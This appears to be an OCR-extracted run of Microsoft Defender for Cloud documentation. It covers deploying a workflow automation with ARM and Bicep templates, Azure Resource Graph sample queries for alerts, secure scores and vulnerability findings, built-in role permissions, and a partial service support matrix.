Consumption logic app workflow in multi-tenant Azure Logic Apps with Bicep or 
Quickstart: Create and deploy a Consumption logic app workflow in multi-tenant Azure 
Logic Apps with an ARM template. 


ARM template tutorial 


A resource manager template is a JavaScript Object Notation (JSON) file that defines the 
infrastructure and configuration for your project. The template uses declarative syntax. 
In declarative syntax, you describe your intended deployment without writing the 
sequence of programming commands to create the deployment. 


If your environment meets the prerequisites and you're familiar with using ARM 
templates, select the Deploy to Azure button. The template will open in the Azure 
portal. 


A\ Deploy to Azure P 


Review the template 


The template used in this quickstart is from Azure Quickstart Templates ©. 


JSON 


"$schema": "https://schema.management.azure.com/schemas/2019-04- 
@1/deploymentTemplate.json#", 
"contentVersion": "1.0.0.0", 
"metadata": { 
"_ generator": { 
"name": "bicep", 
urea gla aa a 
“templateHash": "5191074894407113732" 
} 
J 


"parameters": { 

"automationName": { 
IES a ESENES, 
"maxLength": 24, 
"minLength": 3 

ba 

"location": { 
"type": "string", 


"defaultValue": "[resourceGroup().location]", 
"metadata": { 

"description": “Location for the automation" 
} 


ba 
"logicAppName": { 
"type": "string", 
"minLength": 3 
ine 
"“logicAppResourceGroupName": { 
"type": "string", 
"minLength": 3 
Fo 
"subscriptionId": { 
"type": "string", 
"defaultValue": "[subscription().subscriptionId]", 
"metadata": { 
"description": “The Azure resource GUID id of the subscription" 
} 
Jo 
"alertSettings": { 
"type": "object", 
"metadata": { 
"description": "The alert settings object used for deploying the 
automation" 


} 
} 
Fo 
"variables": { 
"automationDescription": "automation description for subscription {0}", 


"scopeDescription": "automation scope for subscription {0}" 


J 


"resources": [ 
{ 

"type": "Microsoft.Security/automations", 
"apiVersion": "2019-01-01-preview", 
"name": "[parameters('automationName')]", 
"location": "[parameters('location')]", 
"properties": { 

"description": "[format(variables('automationDescription'), 

parameters('subscriptionId'))]", 
"isEnabled": true, 
"actions": [ 


{ 
"actionType": "“LogicApp", 
"logicAppResourceld": "[resourcelId( 'Microsoft.Logic/workflows', 
parameters('logicAppName'))]", 
(rtze ie LLI 


[listCallbackURL(resourceId(parameters('subscriptionId'), 
parameters('logicAppResourceGroupName'), 
'Microsoft.Logic/workflows/triggers', parameters('logicAppName'), 'manual'), 
'2019-05-01').value]" 
} 
LL 
"scopes": [ 
{ 
"description": "[format(variables('scopeDescription'), 
parameters('subscriptionId'))]", 
"scopePath": "[subscription().id]" 


} 
l 
"sources": [ 
{ 
"copy": [ 


{ 


"name": "ruleSets", 
"count": "[length(range(@, 
length(parameters('alertSettings').alertSeverityMapping)))]", 
inputa- 
"rules": [ 
{ 

"propertyJPath": 
[parameters('alertSettings').alertSeverityMapping[range(Q, 
length(parameters('alertSettings').alertSeverityMapping) ) 
[copyIndex('ruleSets')]].jpath]", 

"propertyType": "String", 

"expectedValue": " 
[parameters('alertSettings').alertSeverityMapping[range(@, 
length(parameters('alertSettings').alertSeverityMapping) ) 
[copyIndex('ruleSets')]].expectedValue]", 

"operator": " 
[parameters('alertSettings').alertSeverityMapping[range(@, 
length(parameters('alertSettings').alertSeverityMapping) ) 
[copyIndex('ruleSets')]].operator]" 

Jo 
{ 


"propertyJPath": "Severity", 

"propertyType": "String", 

"expectedValue": " 
[parameters('alertSettings').alertSeverityMapping|[range(@, 
length(parameters('alertSettings').alertSeverityMapping) ) 
[copyIndex( 'ruleSets')]].severity]", 

"operator": "Equals" 

} 
] 
} 
} 
ils 


"eventSource": "Alerts" 


Relevant resources 


e Microsoft.Security/automations: The automation that will trigger the logic app, 
upon receiving a Microsoft Defender for Cloud alert that contains a specific string. 
e Microsoft.Logic/workflows: An empty triggerable Logic App. 


For other Defender for Cloud quickstart templates, see these community contributed 
templates £. 


Deploy the template 


e PowerShell: 


Azure PowerShell 


New-AzResourceGroup -Name <resource-group-name> -Location <resource- 
group-location> #use this command when you need to create a new 
resource group for your deployment 

New-AzResourceGroupDeployment -ResourceGroupName <resource-group-name> 
-TemplateUri https://raw.githubusercontent.com/Azure/azure-quickstart- 
templates/master/quickstarts/microsoft.security/securitycenter-create- 
automation-for-alertnamecontains/azuredeploy.json 


e CLI: 


Azure CLI 


az group create --name <resource-group-name> --location <resource- 
group-location> #use this command when you need to create a new 
resource group for your deployment 

az deployment group create --resource-group <my-resource-group> -- 
template-uri https://raw.githubusercontent.com/Azure/azure-quickstart- 
templates/master/quickstarts/microsoft.security/securitycenter-create- 
automation-for-alertnamecontains/azuredeploy.json 


e Portal: 


A\ Deploy to Azure Se 


To find more information about this deployment option, see Use a deployment 
button to deploy templates from GitHub repository. 


Review deployed resources 

Use the Azure portal to check the workflow automation has been deployed. 
1. Sign in to the Azure portal Z. 
2. Search for and select Microsoft Defender for Cloud. 
3. Select filter. 


4. Select the specific subscription on which you deployed the new workflow 
automation. 


5. From Microsoft Defender for Cloud's menu, open workflow automation and check 
for your new automation. 


x Microsoft Defender for Cloud | Workflow automation ~ & x 
Showing subscription 'Contoso' 
++ Add workflow automation C) Refresh ® Enable Disable E Delete ©) Learn more 
| Filter by name | PD Sel.. Ena... PY Tri Securit... 
Name 4 Status tT, Scope ty Trigger Type Ty Description Ty LogicApp ty 
O dA Test © Enabled Contoso D Defender for Cloud alert Test automation {&} Test2 


A 


Q Tip 


If you have many workflow automations on your subscription, use the filter by 


name option. 


Clean up resources 
When no longer needed, delete the workflow automation using the Azure portal. 
1. Sign in to the Azure portal £. 


2. Search for and select Microsoft Defender for Cloud. 


3. Select filter. 


4. Select the specific subscription on which you deployed the new workflow 


automation. 


5. From Microsoft Defender for Cloud's menu, open workflow automation and find 
the automation to be deleted. 
xs Microsoft Defender for Cloud | Workflow automation ~ = 


Showing subscription ‘Contoso 


-+ Add workflow automation © Refresh ® © E Delete () Learn more 
Delete 


Filter by name | Ø Sel.. Ena... Ø Tri Securit... 
Name 4 Status TMy Scope TA, Trigger Type Ty Description TA, LogicApp Ty 
@ ©) Test © Enabled Contoso @ Defender for Cloud alert Test automation {A} Test2 


6. Select the checkbox for the item to be deleted. 


7. From the toolbar, select Delete. 


Bicep tutorial 


Bicep is a domain-specific language (DSL) that uses declarative syntax to deploy Azure 
resources. It provides concise syntax, reliable type safety, and support for code reuse. 
Bicep offers the best authoring experience for your infrastructure-as-code solutions in 


Azure. 


Review the Bicep file 


The Bicep file used in this quickstart is from Azure Quickstart Templates Z. 


Bicep 


@minLength(3) 
@maxLength( 24) 
param automationName string 


@description('Location for the automation’ ) 
param location string = resourceGroup().location 


@minLength(3) 
param logicAppName string 


@minLength(3) 
param logicAppResourceGroupName string 


@description('The Azure resource GUID id of the subscription’ ) 
param subscriptionId string = subscription().subscriptionId 


@description('The alert settings object used for deploying the automation’ ) 
param alertSettings object 


var automationDescription = ‘automation description for subscription {0}' 
var scopeDescription = ‘automation scope for subscription {0}' 


resource automation 'Microsoft.Security/automations@2019-01-01-preview' = { 
name: automationName 
location: location 
properties: { 
description: format(automationDescription, subscriptionId) 
isEnabled: true 
actions: [ 
{ 
actionType: 'LogicApp' 
logicAppResourceld: resourceld('Microsoft.Logic/workflows', 
logicAppName ) 
uri: listCallbackURL(resourceId(subscriptionId, 
logicAppResourceGroupName, '‘Microsoft.Logic/workflows/triggers', 
logicAppName, 'manual'), '2019-@5-@1').value 
} 
] 
scopes: [ 
il 
description: format(scopeDescription, subscriptionId) 
scopePath: subscription().id 


} 
] 
sources: [ 
{ 
eventSource: ‘Alerts' 
ruleSets: [for j in range(@, 
length(alertSettings.alertSeverityMapping)): { 
rules: [ 
{ 
propertyJPath: alertSettings.alertSeverityMapping[j].jpath 


propertyType: ‘String' 

expectedValue: 
alertSettings.alertSeverityMapping[j].expectedValue 

operator: alertSettings.alertSeverityMapping|j].operator 


propertyJPath: ‘Severity’ 

propertyType: ‘String’ 

expectedValue: alertSettings.alertSeverityMapping[j].severity 
operator: ‘Equals’ 


Relevant resources 


e Microsoft.Security/automations: The automation that will trigger the logic app, 
upon receiving a Microsoft Defender for Cloud alert that contains a specific string. 
e Microsoft.Logic/workflows: An empty triggerable Logic App. 


For other Defender for Cloud quickstart templates, see these community contributed 
templates £. 


Deploy the Bicep file 
1. Save the Bicep file as main.bicep to your local computer. 


2. Deploy the Bicep file using either Azure CLI or Azure PowerShell. 


CLI 


Azure CLI 


az group create --name exampleRG --location eastus 

az deployment group create --resource-group exampleRG --template- 
file main.bicep --parameters automationName=<automation-name> 
logicAppName=<logic-name> logicAppResourceGroupName=<group-name> 
alertSettings={alert-settings} 


You're required to enter the following parameters: 


e automationName: Replace <automation-name> with the name of the 
automation. It has a minimum length of three characters and a maximum 
length of 24 characters. 

e logicAppName: Replace <logic-name> with the name of the logic app. It has 
a minimum length of three characters. 

e logicAppResourceGroupName: Replace <group-name> with the name of 
the resource group in which the resources are located. It has a minimum 
length of three characters. 

e alertSettings: Replace {alert-settings} with the alert settings object used for 
deploying the automation. 


O Note 


When the deployment finishes, you should see a message indicating the 
deployment succeeded. 


Review deployed resources 


Use the Azure portal, Azure CLI, or Azure PowerShell to list the deployed resources in 


the resource group. 


CLI 


Azure CLI 


az resource list --resource-group exampleRG 


Clean up resources 


When no longer needed, use the Azure portal, Azure CLI, or Azure PowerShell to delete 


the resource group and all of its resources. 


CLI 


Azure CLI 


az group delete --name exampleRG 


Next steps 


For step-by-step tutorials that guide you through the process of creating an ARM 
template or a Bicep file, see: 


Tutorial: Create and deploy your first ARM template 


Quickstart: Create Bicep files with Visual Studio Code 


Azure Resource Graph sample queries 
for Microsoft Defender for Cloud 


Article e 07/19/2023 


This page is a collection of Azure Resource Graph sample queries for Microsoft Defender 
for Cloud. For a complete list of Azure Resource Graph samples, see Resource Graph 
samples by Category and Resource Graph samples by Table. 


Sample queries 


Display all active Microsoft Defender for Cloud alerts 
Returns a list of all active alerts in your Microsoft Defender for Cloud tenant. 
Kusto 


securityresources 

| where type =~ 'microsoft.security/locations/alerts' 

| where properties.Status in (‘Active') 

| where properties.Severity in ('Low', 'Medium', 'High') 

| project alert_type = tostring(properties.AlertType), SystemAlertId = 
tostring(properties.SystemAlertId), ResourceIdentifiers = 
todynamic(properties.ResourcelIdentifiers ) 


Azure CLI 


Azure CLI 


az graph query -q “securityresources | where type =~ 
'microsoft.security/locations/alerts' | where properties.Status in 
('Active') | where properties.Severity in ('Low', ‘'Medium', 'High') | 
project alert_type = tostring(properties AlertType), SystemAlertId = 
tostring(properties.SystemAlertId), ResourceIdentifiers = 
todynamic(properties ResourceIdentifiers)”" 


Controls secure score per subscription 
Returns controls secure score per subscription. 


Kusto 


SecurityResources 

| where type == 'microsoft.security/securescores/securescorecontrols' 

| extend controlName=properties.displayName, 
controlId=properties.definition.name, 
notApplicableResourceCount=properties.notApplicableResourceCount, 
unhealthyResourceCount=properties.unhealthyResourceCount, 
healthyResourceCount=properties.healthyResourceCount, 
percentageScore=properties.score.percentage, 
currentScore=properties.score.current, 
maxScore=properties.definition.properties.maxScore, 
weight=properties.weight, 
controlType=properties.definition.properties.source.sourceType, 


controlRecommendationIds=properties.definition.properties.assessmentDefiniti 
ons 

| project tenantId, subscriptionId, controlName, controlId, 
unhealthyResourceCount, healthyResourceCount, notApplicableResourceCount, 
percentageScore, currentScore, maxScore, weight, controlType, 
controlRecommendationIds 


Azure CLI 


Azure CLI 


az graph query -q "SecurityResources | where type == 
‘microsoft.security/securescores/securescorecontrols' | extend 
controlName=properties.displayName, 
controlId=properties.definition.name, 
notApplicableResourceCount=properties.notApplicableResourceCount, 
unhealthyResourceCount=properties.unhealthyResourceCount, 
healthyResourceCount=properties.healthyResourceCount, 
percentageScore=properties.score.percentage, 
currentScore=properties.score.current, 
maxScore=properties.definition.properties.maxScore, 
weight=properties.weight, 
controlType=properties.definition.properties.source.sourceType, 
controlRecommendationIds=properties.definition.properties.assessmentDefi 
nitions | project tenantId, subscriptionId, controlName, controlId, 
unhealthyResourceCount, healthyResourceCount, 
notApplicableResourceCount, percentageScore, currentScore, maxScore, 
weight, controlType, controlRecommendationIds" 


Count healthy, unhealthy, and not applicable resources 
per recommendation 


Returns count of healthy, unhealthy, and not applicable resources per recommendation. 
Use summarize and count to define how to group and aggregate the values by property. 


Kusto 


SecurityResources 

| where type == 'microsoft.security/assessments' 

| extend resourceld=id, 
recommendationId=name, 
resourceType=type, 
recommendationName=properties.displayName, 
source=properties.resourceDetails.Source, 
recommendationState=properties.status.code, 
description=properties.metadata.description, 
assessmentType=properties.metadata.assessmentType, 
remediationDescription=properties.metadata.remediationDescription, 
policyDefinitionId=properties.metadata.policyDefinitionId, 
implementationEffort=properties.metadata.implementationEffort, 
recommendationSeverity=properties.metadata.severity, 
category=properties.metadata.categories, 
userImpact=properties.metadata.userImpact, 
threats=properties.metadata.threats, 
portalLink=properties.links.azurePortal 

| summarize numberOfResources=count(resourceld) by 

tostring(recommendationName), tostring(recommendationState) 


Azure CLI 


Azure CLI 


az graph query -q "SecurityResources | where type == 
'microsoft.security/assessments' | extend resourceld=id, 
recommendationId=name, resourceType=type, 
recommendationName=properties.displayName, 
source=properties.resourceDetails.Source, 
recommendationState=properties.status.code, 
description=properties.metadata.description, 
assessmentType=properties.metadata.assessmentType, 
remediationDescription=properties.metadata.remediationDescription, 
policyDefinitionId=properties.metadata.policyDefinitionId, 
implementationEffort=properties.metadata.implementationEffort, 
recommendationSeverity=properties.metadata.severity, 
category=properties.metadata.categories, 
userImpact=properties.metadata.userImpact, 
threats=properties.metadata.threats, 
portalLink=properties.links.azurePortal | summarize 
numberOfResources=count(resourceld) by tostring(recommendationName) , 
tostring(recommendationState)" 


Get all loT alerts on hub, filtered by type 


Returns all loT alerts for a specific hub (replace placeholder {hub_id}) and alert type 
(replace placeholder {alert_type} ). 


Kusto 
SecurityResources 


| where type =~ 'microsoft.security/iotalerts' and id contains '{hub_id}' 
and properties.alertType contains ‘falert_type}' 


Azure CLI 


Azure CLI 


az graph query -q "SecurityResources | where type =~ 
‘microsoft.security/iotalerts' and id contains '{hub_id}' and 
properties.alertType contains '{alert_type}'" 


Get sensitivity insight of a specific resource 


Returns sensitivity insight of a specific resource (replace placeholder {resource_id}). 


Kusto 


SecurityResources 


| where type == 'microsoft.security/insights/classification' 


| where properties.associatedResource contains '$resource_id' 
| project SensitivityInsight = 


properties.insightProperties.purviewCatalogs[@].sensitivity 


Azure CLI 


Azure CLI 


az graph query -q "SecurityResources | where type == 


'microsoft.security/insights/classification' | where 
properties.associatedResource contains '\$resource_id' | project 
SensitivityInsight = 


properties. insightProperties.purviewCatalogs[@].sensitivity” 


Get specific loT alert 


Returns specific loT alert by a provided system alert ID (replace placeholder 
{system _Alert_Id}) 


Kusto 


SecurityResources 


| where type =~ 'microsoft.security/iotalerts' and properties.systemAlertId 
contains ‘'{system_Alert_Id}' 


Azure CLI 


Azure CLI 


az graph query -q "SecurityResources | where type =~ 
"microsoft.security/iotalerts' and properties.systemAlertId contains 
"{system_Alert_Id}'" 


List Container Registry vulnerability assessment results 


Returns all the all the vulnerabilities found on container images. Microsoft Defender for 
Containers has to be enabled in order to view these security findings. 


Kusto 


SecurityResources 
| where type == 'microsoft.security/assessments' 
| where properties.displayName contains ‘Container registry images should 
have vulnerability findings resolved’ 
| summarize by assessmentKey=name //the ID of the assessment 
| join kind=inner ( 
securityresources 
| where type == 'microsoft.security/assessments/subassessments ' 
| extend assessmentKey = extract('.*assessments/(.+?)/.*',1, id) 
) on assessmentKey 
| project assessmentKey, subassessmentKey=name, id, parse _json(properties), 
resourceGroup, subscriptionId, tenantId 
| extend description = properties.description, 
displayName = properties.displayName, 
resourceld = properties.resourceDetails.id, 
resourceSource = properties.resourceDetails.source, 
category = properties.category, 
severity = properties.status.severity, 
code = properties.status.code, 
timeGenerated = properties.timeGenerated, 
remediation = properties.remediation, 
impact = properties.impact, 


vulniId = properties.id, 
additionalData = properties.additionalData 


Azure CLI 


Azure CLI 


az graph query -q "SecurityResources | where type == 
"microsoft.security/assessments' | where properties.displayName contains 
"Container registry images should have vulnerability findings resolved' 

| summarize by assessmentKey=name //the ID of the assessment | join 
kind=inner ( securityresources | where type == 
'microsoft.security/assessments/subassessments' | extend assessmentKey = 
extract('.*assessments/(.+?)/.*',1, id) ) on assessmentKey | project 
assessmentKey, subassessmentKey=name, id, parse_json(properties), 
resourceGroup, subscriptionId, tenantId | extend description = 
properties.description, displayName = properties.displayName, resourceld 
= properties.resourceDetails.id, resourceSource = 
properties.resourceDetails.source, category = properties.category, 
severity = properties.status.severity, code = properties.status.code, 
timeGenerated = properties.timeGenerated, remediation = 
properties.remediation, impact = properties.impact, vulnId = 
properties.id, additionalData = properties.additionalData" 


List Microsoft Defender recommendations 


Returns all Microsoft Defender assessments, organized in tabular manner with field per 
property. 


Kusto 


SecurityResources 

| where type == 'microsoft.security/assessments' 

| extend resourceld=id, 
recommendationId=name, 
recommendationName=properties.displayName, 
source=properties.resourceDetails.Source, 
recommendationState=properties.status.code, 
description=properties.metadata.description, 
assessmentType=properties.metadata.assessmentType, 
remediationDescription=properties.metadata.remediationDescription, 
policyDefinitionId=properties.metadata.policyDefinitionId, 
implementationEffort=properties.metadata.implementationEffort, 
recommendationSeverity=properties.metadata.severity, 
category=properties.metadata.categories, 
userImpact=properties.metadata.userImpact, 
threats=properties.metadata.threats, 
portalLink=properties.links.azurePortal 


| project tenantId, subscriptionId, resourceId, recommendationName, 
recommendationId, recommendationState, recommendationSeverity, description, 
remediationDescription, assessmentType, policyDefinitionId, 
implementationEffort, userImpact, category, threats, source, portalLink 


Azure CLI 


Azure CLI 


az graph query -q "SecurityResources | where type == 
‘microsoft.security/assessments' | extend resourceld=id, 
recommendationId=name, recommendationName=properties.displayName, 
source=properties.resourceDetails.Source, 
recommendationState=properties.status.code, 
description=properties.metadata.description, 
assessmentType=properties.metadata.assessmentType, 
remediationDescription=properties.metadata.remediationDescription, 
policyDefinitionId=properties.metadata.policyDefinitionId, 
implementationEffort=properties.metadata.implementationEffort, 
recommendationSeverity=properties.metadata.severity, 
category=properties.metadata.categories, 
userImpact=properties.metadata.userImpact, 
threats=properties.metadata.threats, 
portalLink=properties.links.azurePortal | project tenantId, 
subscriptionId, resourceId, recommendationName, recommendationId, 
recommendationState, recommendationSeverity, description, 
remediationDescription, assessmentType, policyDefinitionId, 
implementationEffort, userImpact, category, threats, source, portalLink” 


List Qualys vulnerability assessment results 


Returns all the vulnerabilities found on virtual machines that have a Qualys agent 
installed. 


Kusto 


SecurityResources 
| where type == 'microsoft.security/assessments' 
| where * contains ‘vulnerabilities in your virtual machines' 
| summarize by assessmentKey=name //the ID of the assessment 
| join kind=inner ( 
securityresources 
| where type == 'microsoft.security/assessments/subassessments ' 
| extend assessmentKey = extract('.*assessments/(.+?)/.*',1, id) 
) on assessmentKey 
| project assessmentKey, subassessmentKey=name, id, parse _json(properties), 
resourceGroup, subscriptionId, tenantId 
| extend description = properties.description, 


displayName = properties.displayName, 
resourceld = properties.resourceDetails.id, 
resourceSource = properties.resourceDetails.source, 
category = properties.category, 

severity = properties.status.severity, 

code = properties.status.code, 
timeGenerated = properties.timeGenerated, 
remediation = properties.remediation, 
impact = properties.impact, 

vulnid = properties.id, 

additionalData = properties.additionalData 


Azure CLI 


Azure CLI 


az graph query -q "SecurityResources | where type == 
‘microsoft.security/assessments' | where * contains ‘vulnerabilities in 
your virtual machines' | summarize by assessmentKey=name //the ID of the 
assessment | join kind=inner ( securityresources | where type == 
‘microsoft.security/assessments/subassessments' | extend assessmentKey = 
extract('.*assessments/(.+?)/.*',1, id) ) on assessmentKey | project 
assessmentKey, subassessmentKey=name, id, parse _json(properties), 
resourceGroup, subscriptionId, tenantId | extend description = 
properties.description, displayName = properties.displayName, resourceld 
= properties.resourceDetails.id, resourceSource = 
properties.resourceDetails.source, category = properties.category, 
severity = properties.status.severity, code = properties.status.code, 
timeGenerated = properties.timeGenerated, remediation = 
properties.remediation, impact = properties.impact, vulnId = 
properties.id, additionalData = properties.additionalData" 


Regulatory compliance assessments state 
Returns regulatory compliance assessments state per compliance standard and control. 
Kusto 


SecurityResources 

| where type == 
‘microsoft.security/regulatorycompliancestandards/regulatorycompliancecontro 
ls/regulatorycomplianceassessments' 

| extend assessmentName=properties.description, 


complianceStandard=extract(@'/regulatoryComplianceStandards/(.+)/regulatoryC 
omplianceControls',1,id), 


complianceControl=extract(@'/regulatoryComplianceControls/(.+)/regulatoryCom 
plianceAssessments',1,id), 


skippedResources=properties.skippedResources, 
passedResources=properties.passedResources, 
failedResources=properties.failedResources, 
state=properties.state 
| project tenantId, subscriptionId, id, complianceStandard, 
complianceControl, assessmentName, state, skippedResources, passedResources, 
failedResources 


Azure CLI 


Azure CLI 


az graph query -q "SecurityResources | where type == 
"microsoft.security/regulatorycompliancestandards/regulatorycomplianceco 
ntrols/regulatorycomplianceassessments' | extend 
assessmentName=properties.description, 
complianceStandard=extract(@'/regulatoryComplianceStandards/(.+)/regulat 
oryComplianceControls',1,id), 
complianceControl=extract(@'/regulatoryComplianceControls/(.+)/regulator 
yComplianceAssessments',1,id), 
skippedResources=properties.skippedResources, 
passedResources=properties.passedResources, 
failedResources=properties.failedResources, state=properties.state | 
project tenantId, subscriptionId, id, complianceStandard, 
complianceControl, assessmentName, state, skippedResources, 
passedResources, failedResources” 


Regulatory compliance state per compliance standard 
Returns regulatory compliance state per compliance standard per subscription. 


Kusto 


SecurityResources 

| where type == 'microsoft.security/regulatorycompliancestandards' 

| extend complianceStandard=name, 
state=properties.state, 
passedControls=properties.passedControls, 
failedControls=properties.failedControls, 
skippedControls=properties.skippedControls, 
unsupportedControls=properties.unsupportedControls 

| project tenantId, subscriptionId, complianceStandard, state, 

passedControls, failedControls, skippedControls, unsupportedControls 


Azure CLI 


Azure CLI 


az graph query -q "“SecurityResources | where type == 
'microsoft.security/regulatorycompliancestandards' | extend 
complianceStandard=name, state=properties.state, 
passedControls=properties.passedControls, 
failedControls=properties.failedControls, 
skippedControls=properties.skippedControls, 
unsupportedControls=properties.unsupportedcontrols | project tenantId, 
subscriptionId, complianceStandard, state, passedControls, 
failedControls, skippedControls, unsupportedControls" 


Secure score per management group 
Returns secure score per management group. 
Kusto 


SecurityResources 
| where type == 'microsoft.security/securescores' 
| project subscriptionId, 
subscriptionTotal = iff(properties.score.max == 0, 0.00, 
round(tolong(properties.weight) * 
todouble(properties.score.current)/tolong(properties.score.max),2)), 
weight = tolong(iff(properties.weight == ©, 1, properties.weight) ) 
| join kind=leftouter ( 


ResourceContainers 
| where type == 'microsoft.resources/subscriptions' and properties.state 
== 'Enabled' 


| project subscriptionId, 
mgChain=properties.managementGroupAncestorsChain | 

on subscriptionId 
| mv-expand mg=mgChain 
| summarize sumSubs = sum(subscriptionTotal), sumWeight = sum(weight), 
resultsNum = count() by tostring(mg.displayName), mgId = tostring(mg.name) 
| extend secureScore = iff(tolong(resultsNum) == ©, 404.00, 
round(sumSubs/sumWeight*1@@, 2) ) 
| project mgName=mg_displayName, mgId, sumSubs, sumWeight, resultsNum, 
secureScore 
| order by mgName asc 


Azure CLI 


Azure CLI 


az graph query -q "SecurityResources | where type == 
"microsoft.security/securescores' | project subscriptionId, 


subscriptionTotal = iff(properties.score.max == ©, 0.00, 
round(tolong(properties.weight) * 
todouble(properties.score.current)/tolong(properties.score.max),2)), 
weight = tolong(iff(properties.weight == ©, 1, properties.weight)) | 
join kind=leftouter ( ResourceContainers | where type == 
‘microsoft.resources/subscriptions' and properties.state == 'Enabled' | 
project subscriptionId, mgChain=properties.managementGroupAncestorsChain 
) on subscriptionId | mv-expand mg=mgChain | summarize sumSubs = 
sum(subscriptionTotal), sumWeight = sum(weight), resultsNum = count() by 
tostring(mg.displayName), mgId = tostring(mg.name) | extend secureScore 
= iff(tolong(resultsNum) == ©, 404.00, round(sumSubs/sumWeight*100,2)) | 
project mgName=mg_displayName, mgId, sumSubs, sumWeight, resultsNum, 
secureScore | order by mgName asc" 


Secure score per subscription 
Returns secure score per subscription. 
Kusto 


SecurityResources 
| where type == 'microsoft.security/securescores' 
| extend percentageScore=properties.score.percentage, 
currentScore=properties.score.current, 
maxScore=properties.score.max, 
weight=properties.weight 
| project tenantId, subscriptionId, percentageScore, currentScore, maxScore, 
weight 


Azure CLI 


Azure CLI 


az graph query -q "SecurityResources | where type == 
'microsoft.security/securescores' | extend 
percentageScore=properties.score.percentage, 
currentScore=properties.score.current, maxScore=properties.score.max, 
weight=properties.weight | project tenantId, subscriptionId, 
percentageScore, currentScore, maxScore, weight" 


Show Defender for Cloud plan pricing tier per 
subscription 


Returns Defender for Cloud plan pricing tier plan per subscription. 


Kusto 


SecurityResources 

| where type == 'microsoft.security/pricings' 

| project Subscription= subscriptionId, Azure_Defender_plan= name, Status= 
properties.pricingTier 


Azure CLI 


Azure CLI 


az graph query -q "SecurityResources | where type == 
'microsoft.security/pricings' | project Subscription= subscriptionId, 
Azure_Defender_plan= name, Status= properties.pricingTier"” 


Next steps 


e Learn more about the query language. 

e Learn more about how to explore resources. 
e See samples of Starter language queries. 

e See samples of Advanced language queries. 


User roles and permissions 


Article e 10/09/2023 


Microsoft Defender for Cloud uses Azure role-based access control (Azure RBAC) to 
provide built-in roles. You can assign these roles to users, groups, and services in Azure 


to give users access to resources according to the access defined in the role. 


Defender for Cloud assesses the configuration of your resources to identify security 
issues and vulnerabilities. In Defender for Cloud, you only see information related to a 
resource when you're assigned one of these roles for the subscription or for the 
resource group the resource Is in: Owner, Contributor, or Reader. 


In addition to the built-in roles, there are two roles specific to Defender for Cloud: 


e Security Reader: A user that belongs to this role has read-only access to Defender 
for Cloud. The user can view recommendations, alerts, a security policy, and 
security states, but can't make changes. 

e Security Admin: A user that belongs to this role has the same access as the 
Security Reader and can also update the security policy, and dismiss alerts and 
recommendations. 


We recommend that you assign the least permissive role needed for users to complete 
their tasks. For example, assign the Reader role to users who only need to view 
information about the security health of a resource but not take action, such as applying 


recommendations or editing policies. 


Roles and allowed actions 


The following table displays roles and allowed actions in Defender for Cloud. 


Action Security Security Contributor Contributor Owner 
Reader/ Admin / Owner 
Reader 
(Resource (Subscription (Subscription 
group level) level) level) 
Add/assign initiatives - v - - vV 


(including) regulatory 
compliance standards) 


Edit security policy - vV - - vV 


Action Security Security Contributor Contributor Owner 
Reader/ Admin / Owner 


Reader 
Enable / disable - ZA - ZA ZA 
Microsoft Defender 
plans 
Dismiss alerts - ZA - ZA ZA 
Apply security - - vV v v 
recommendations for a 
resource 
(and use Fix) 
View alerts and ZA ZA ZA ZA ZA 
recommendations 
Exempt security - - Vv v v 


recommendations 


The specific role required to deploy monitoring components depends on the extension 
you're deploying. Learn more about monitoring components. 


Roles used to automatically provision agents 
and extensions 


To allow the Security Admin role to automatically provision agents and extensions used 
in Defender for Cloud plans, Defender for Cloud uses policy remediation in a similar way 
to Azure Policy. To use remediation, Defender for Cloud needs to create service 
principals, also called managed identities that assign roles at the subscription level. For 
example, the service principals for the Defender for Containers plan are: 


Service Principal Roles 


Defender for Containers provisioning AKS Security Profile e Kubernetes Extension 
Contributor 
e Contributor 
e Azure Kubernetes Service 
Contributor 
e Log Analytics Contributor 


Defender for Containers provisioning Arc-enabled Kubernetes e Azure Kubernetes Service 
Contributor 
e Kubernetes Extension 
Contributor 


Service Principal Roles 


e Contributor 
e Log Analytics Contributor 


Defender for Containers provisioning Azure Policy for e Kubernetes Extension 
Kubernetes Contributor 
e Contributor 
e Azure Kubernetes Service 
Contributor 


Defender for Containers provisioning Policy extension for Arc- e Azure Kubernetes Service 
enabled Kubernetes Contributor 
e Kubernetes Extension 
Contributor 
e Contributor 


Next steps 


This article explained how Defender for Cloud uses Azure RBAC to assign permissions to 
users and identified the allowed actions for each role. Now that you're familiar with the 
role assignments needed to monitor the security state of your subscription, edit security 
policies, and apply recommendations, learn how to: 


e Set security policies in Defender for Cloud 

e Manage security recommendations in Defender for Cloud 

e Manage and respond to security alerts in Defender for Cloud 
e Monitor partner security solutions 


Support matrices for Defender for 
Cloud 


Article e 05/15/2023 


This article describes Azure services and client operating systems that are supported by 
Microsoft Defender for Cloud. For Azure cloud support, review this article 


Security benefits for Azure services 


Defender for Cloud provides recommendations, security alerts, and vulnerability 


assessment for these Azure services: 


Service Recommendations free with Security Vulnerability 
Foundational CSPM alerts assessment 
Azure App Service vV v - 
Azure Automation account vV - - 
Azure Batch account vV - a 
Azure Blob Storage Vv vV - 
Azure Cache for Redis v - - 
Azure Cloud Services vV - E 
Azure Cognitive Search vV - - 
Azure Container Registry v v Defender for 
Containers 
Azure Cosmos DB* vV vV - 
Azure Data Lake Analytics vV - - 
Azure Data Lake Storage vV vV - 
Azure Database for MySQL* - v - 
Azure Database for - vV - 
PostgreSQL* 
Azure Event Hubs namespace vV - - 


Azure Files ZA ZA - 


Service 


Azure Functions app 
Azure Key Vault 

Azure Kubernetes Service 
Azure Load Balancer 
Azure Logic Apps 


Azure SQL Database 


Azure SQL Managed Instance 


Azure Service Bus namespace 
Azure Service Fabric account 
Azure Stream Analytics 

Azure Subscription 


Azure Virtual Network 
(incl. subnets, NICs, and 
network security groups) 


* These features are currently supported in preview. 


Recommendations free with 
Foundational CSPM 


v 


v 


Security Vulnerability 


alerts assessment 
J 
J - 
V Defender for 
Azure SQL 
V Defender for 
Azure SQL 
J n 


** Azure Active Directory (Azure AD) recommendations are available only for 


subscriptions with enhanced security features enabled. 


Supported operating systems 


Defender for Cloud depends on the Azure Monitor Agent or the Log Analytics agent. 


Make sure that your machines are running one of the supported operating systems as 


described on the following pages: 


e Azure Monitor Agent 


o Azure Monitor Agent for Windows supported operating systems 


o Azure Monitor Agent for Linux supported operating systems 


e Log Analytics agent 


o Log Analytics agent for Windows supported operating systems 


o Log Analytics agent for Linux supported operating systems 


Also ensure your Log Analytics agent is properly configured to send data to Defender 
for Cloud. 


To learn more about the specific Defender for Cloud features available on Windows and 


Linux, review: 
